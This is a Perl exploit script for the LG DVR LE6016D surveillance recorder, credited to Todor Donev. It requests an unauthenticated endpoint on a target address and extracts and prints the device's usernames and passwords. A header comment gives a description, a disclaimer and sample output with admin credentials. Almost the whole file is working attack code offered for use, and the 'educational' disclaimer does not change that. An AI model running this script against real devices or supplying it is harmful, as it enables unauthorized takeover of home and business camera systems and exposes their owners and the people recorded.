#!/usr/bin/perl
#
#LG DVR LE6016D unauthenticated remote
# users/passwords disclosure exploit
#
#
#Copyright 2015 (c) Todor Donev
#<todor.donev at gmail.com>
#http://www.ethical-hacker.org/
####
#
#Digital video recorder (DVR) surveillance is the use of cameras,
#often hidden or concealed, that use DVR technology to record
#video for playback or immediate viewing. As technological
#innovations have made improvements in the security and
#surveillance industry, DVR surveillance has become more
#prominent and allows for easier and more versatile security
#systems in homes and businesses. A DVR surveillance security
#system can be designed for indoor use or outdoor use and can
#often involve hidden security cameras, concealed “nanny cams”
#for home security, and even personal recording devices hidden
#on a person.
#
####
#
#Description:
#No authentication (login) is required to exploit this vulnerability.
#This program demonstrates how unpatched security bug would enable
#hackers to gain control of a vulnerable device while sitting
#behind their keyboard, potentially thousands of miles away.
#An unauthenticated attacker that is connected to the DVR's may be
#able to retrieve the device's administrator password allowing them
#to directly access the device's configuration control panel.
#
####
#
#Disclaimer:
#This or previous programs is for Educational purpose ONLY. Do not
#use it without permission.The usual disclaimer applies, especially
#the fact that Todor Donev is not liable for any damages caused by
#direct or indirect use of the information or functionality provided
#by these programs. The author or any Internet provider bears NO
#responsibility for content or misuse of these programs or any
#derivatives thereof. By using these programs you accept the fact
#that any damage (dataloss, system crash, system compromise, etc.)
#caused by the use of these programs is not Todor Donev's
#responsibility.
#
####
#Use them at your own risk!
####
#
# $ perl lg.pl 133.7.133.7:80
#LG DVR LE6016D unauthenticated remote
#users/passwords disclosure exploit
#u/p: admin/000000
#u/p: user1/000000
#u/p: user2/000000
#u/p: user3/000000
#u/p: LOGOUT/000000
# Copyright 2015 (c) Todor Donev
# <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
#
####
use LWP::Simple;
print " LG DVR LE6016D unauthenticated remote\n users/passwords disclosure exploit\n";
if (@ARGV == 0) {&usg; &foot;}
while (@ARGV > 0) {
$t = shift(@ARGV);
}
my $r = get("http://$t/dvr/wwwroot/user.cgi") or die("Error $!");
for (my $i=0; $i <= 4; $i++){
if($r =~ m/<name>(.*)<\/name>/g){
print " u\/p: $1\/";
}
if($r =~ m/<pw>(.*)<\/pw>/g){
print "$1\n";
}
}
&foot;
sub usg(){
print "\n Usage: perl $0 <target:port>\n Example: perl $0 133.7.133.7:80\n\n";
}
sub foot(){
print "Copyright 2015 (c) Todor Donev\n<todor.donev at gmail.com>\n";
print "http://www.ethical-hacker.org/\n";
exit;
}